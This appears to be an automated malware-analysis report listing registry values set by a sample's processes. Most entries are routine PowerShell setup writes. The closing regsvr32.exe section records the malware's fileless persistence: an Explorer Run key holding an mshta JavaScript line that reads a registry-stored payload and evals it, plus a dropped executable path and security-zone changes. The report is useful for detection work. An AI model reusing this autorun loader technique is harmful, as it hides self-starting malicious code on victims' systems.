"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "F4 70 E9 7C 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"

The process PSCustomSetupUtil.exe:3232 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 16 5B 2D A4 65 01 3B 09 87 44 52 17 85 53 61"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "64 A9 22 7D 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"

The process PSCustomSetupUtil.exe:3028 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 58 E4 2A 0C 1B 46 92 3C 0E 06 CF 3E 9B D4 6F"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "CE 3C 53 7C 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"

The process PSCustomSetupUtil.exe:3104 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 23 37 1F DC F6 AB 0A E8 7B 2C D3 7C 61 AC 1D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "68 EA A1 7C 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"

The process PSCustomSetupUtil.exe:3256 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F 30 42 55 C7 32 4A DE CB 09 CC C2 89 41 36 5E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "9C 45 3F 7D 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "201"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "202"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "180"
"StoreChangeIDFor32BitProcesses" = "201"

The process PSCustomSetupUtil.exe:3892 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 0D 3E 3B E3 EC D6 D6 EA 9A 80 D8 33 CB 59 13"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "E0 58 9E 80 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"

The process PSCustomSetupUtil.exe:3844 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 44 B6 DB 7C E0 88 23 8C DB 97 F0 31 E0 D8 52"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "A0 0D 52 80 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"

The process PSCustomSetupUtil.exe:2872 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 A2 1D 39 4D 8D BB 94 B5 F1 C8 C6 18 26 86 D3"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "FA BB 8F 7B 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"

The process PSCustomSetupUtil.exe:3768 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 55 AD 70 07 99 9B FC 7B 08 78 A0 51 E0 7D DA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:3936 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F F9 DB 44 1B AD 76 67 1C 9F F7 2B 63 EC 55 E5"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "80 7E C4 80 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"

The process PSCustomSetupUtil.exe:3984 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 A2 2C AC EC F7 95 D6 D1 06 DC 18 81 67 1D 55"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "0C 05 0C 81 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "210"
"StoreChangeIDFor64BitProcesses" = "188"
"StoreChangeIDFor32BitProcesses" = "209"

The process PSCustomSetupUtil.exe:2972 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 85 95 2E 65 F6 BC 3D A0 AB 16 C5 AE B3 72 3F"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "8E F1 06 7C 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"

The process PSCustomSetupUtil.exe:3284 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 1A 3B AB C6 4F 79 25 07 60 24 36 39 3E 47 91"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "D4 E1 5B 7D 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"

The process PSCustomSetupUtil.exe:3788 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 05 80 B2 05 16 C7 F0 76 1F B1 40 38 07 DC 80"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2896 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 80 63 A0 48 03 E1 E3 CF 52 35 CB 22 77 E4 10"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "9A E1 B5 7B 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"

The process PSCustomSetupUtil.exe:3192 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC D7 86 48 7C 99 7B 9E D9 80 06 DE D2 A8 CB 84"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "2C 0D 06 7D 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"

The process PSCustomSetupUtil.exe:3960 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 3D 2A 05 60 58 E5 2C 74 02 6A 67 04 72 96 43"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "C6 41 E8 80 03 86 D1 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"

The process PSCustomSetupUtil.exe:2792 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 C3 DE B0 72 C8 AF 66 F6 69 85 AD 64 5B B5 A9"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "60 0E 41 7B 03 86 D1 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"

The process PSSetupNativeUtils.exe:2068 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 84 B1 2F 8C 8E 15 51 5F 14 1C 4E DA 8E A5 C2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process regsvr32.exe:436 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\e307dfcb0a]
"099fdde6" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mshta javascript:F5CnJkc=Z;E4O8=new ActiveXObject(WScript.Shell);tdD5EP4p=A3N7zU;oP2oz=E4O8.RegRead(HKLM\\software\\e307dfcb0a\\5119f545);IHN4fCIOH=ppQTrm;eval(oP2oz);bV4nVps=EcUnA8zi;"

[HKCU\Software\e307dfcb0a]
"099fdde6" = "1"

[HKLM\SOFTWARE\e307dfcb0a]
"f4ea4294" = "875"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ovuki\ovuki.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ovuki\ovuki.exe"
"5232108f" = "¡¯… SñäÐôsÃ…8,¼‚Å;QpÅ’oëDôGfÊj/›&Â¥#YW°~ ýÉ¥´E/ôñÝÙln‹[^7Ù‰ÉåS¤Øl©Czæñ xˆí·uÛÓÉ„hµññKro“´®­„Ù,ÅÀ~‡ “LãŸE D´ÉAžR°ø7A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
